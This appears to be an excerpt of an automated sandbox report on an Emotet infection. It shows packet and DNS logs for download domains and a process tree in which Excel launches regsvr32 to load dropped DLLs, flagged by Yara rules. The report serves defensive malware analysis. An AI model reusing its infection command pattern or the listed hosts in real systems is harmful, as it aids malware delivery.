                              Nov 15, 2022 12:40:10.453672886 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.458527088 CET49173443192.168.2.22163.172.115.127
                              Nov 15, 2022 12:40:10.676985979 CET4917480192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.705004930 CET8049174163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:10.705257893 CET4917480192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.705492020 CET4917480192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.821580887 CET8049174163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:10.821870089 CET4917480192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.850272894 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.850322008 CET44349175163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:10.850511074 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.850554943 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.850562096 CET44349175163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:10.961767912 CET44349175163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:10.961927891 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.978374958 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.978423119 CET44349175163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:10.979127884 CET44349175163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:10.979226112 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.987621069 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:10.987648964 CET44349175163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.113782883 CET44349175163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.113881111 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.113909006 CET44349175163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.113964081 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.113965034 CET44349175163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.114027023 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.240322113 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.240322113 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.240386009 CET44349175163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.240469933 CET49175443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.241034985 CET49176443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.241122961 CET44349176163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.241208076 CET49176443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.241398096 CET49176443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.241420031 CET44349176163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.309288025 CET44349176163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.309421062 CET49176443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.424685001 CET49176443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.424736023 CET44349176163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.427201033 CET49176443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.427253962 CET44349176163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.821388006 CET44349176163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.821480989 CET49176443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.821507931 CET44349176163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.821562052 CET49176443192.168.2.22163.172.108.69
                              Nov 15, 2022 12:40:11.876975060 CET44349176163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.877005100 CET44349176163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.877152920 CET44349176163.172.108.69192.168.2.22
                              Nov 15, 2022 12:40:11.877183914 CET49176443192.168.2.22163.172.108.69

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 15, 2022 12:40:06.655955076 CET5586853192.168.2.228.8.8.8
                              Nov 15, 2022 12:40:06.853779078 CET53558688.8.8.8192.168.2.22
                              Nov 15, 2022 12:40:06.855714083 CET137137192.168.2.22192.168.2.255
                              Nov 15, 2022 12:40:07.607971907 CET137137192.168.2.22192.168.2.255
                              Nov 15, 2022 12:40:08.372483015 CET137137192.168.2.22192.168.2.255
                              Nov 15, 2022 12:40:09.279464006 CET4968853192.168.2.228.8.8.8
                              Nov 15, 2022 12:40:09.297105074 CET53496888.8.8.8192.168.2.22
                              Nov 15, 2022 12:40:10.640863895 CET5883653192.168.2.228.8.8.8
                              Nov 15, 2022 12:40:10.675935984 CET53588368.8.8.8192.168.2.22
                              Nov 15, 2022 12:40:12.140836954 CET5013453192.168.2.228.8.8.8
                              Nov 15, 2022 12:40:12.388277054 CET53501348.8.8.8192.168.2.22
                              Nov 15, 2022 12:40:33.834461927 CET138138192.168.2.22192.168.2.255
                              Nov 15, 2022 12:42:03.388410091 CET138138192.168.2.22192.168.2.255

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 15, 2022 12:40:06.655955076 CET192.168.2.228.8.8.80xbe2cStandard query (0)sat7ate.comA (IP address)IN (0x0001)false
                              Nov 15, 2022 12:40:09.279464006 CET192.168.2.228.8.8.80xe529Standard query (0)www.spinbalence.comA (IP address)IN (0x0001)false
                              Nov 15, 2022 12:40:10.640863895 CET192.168.2.228.8.8.80xde8dStandard query (0)www.3d-stickers.comA (IP address)IN (0x0001)false
                              Nov 15, 2022 12:40:12.140836954 CET192.168.2.228.8.8.80xbac2Standard query (0)navylin.comA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 15, 2022 12:40:06.853779078 CET8.8.8.8192.168.2.220xbe2cServer failure (2)sat7ate.comnonenoneA (IP address)IN (0x0001)false
                              Nov 15, 2022 12:40:09.297105074 CET8.8.8.8192.168.2.220xe529No error (0)www.spinbalence.com163.172.115.127A (IP address)IN (0x0001)false
                              Nov 15, 2022 12:40:10.675935984 CET8.8.8.8192.168.2.220xde8dNo error (0)www.3d-stickers.com163.172.108.69A (IP address)IN (0x0001)false
                              Nov 15, 2022 12:40:12.388277054 CET8.8.8.8192.168.2.220xbac2No error (0)navylin.com47.92.133.65A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • www.spinbalence.com
                              • www.3d-stickers.com
                              • 218.38.121.17
                              • navylin.com

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:12:40:13
                              Start date:15/11/2022
                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                              Imagebase:0x13f350000
                              File size:28253536 bytes
                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:4
                              Start time:12:40:25
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:5
                              Start time:12:40:27
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:7
                              Start time:12:40:28
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:8
                              Start time:12:40:32
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.940135302.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.939239138.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Target ID:9
                              Start time:12:40:34
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1211244100.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1210480334.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Target ID:10
                              Start time:12:41:27
                              Start date:15/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll
                              Imagebase:0xff180000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1211898571.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1210482177.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000A.00000002.1210571701.00000000002BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                              Disassembly

                              No disassembly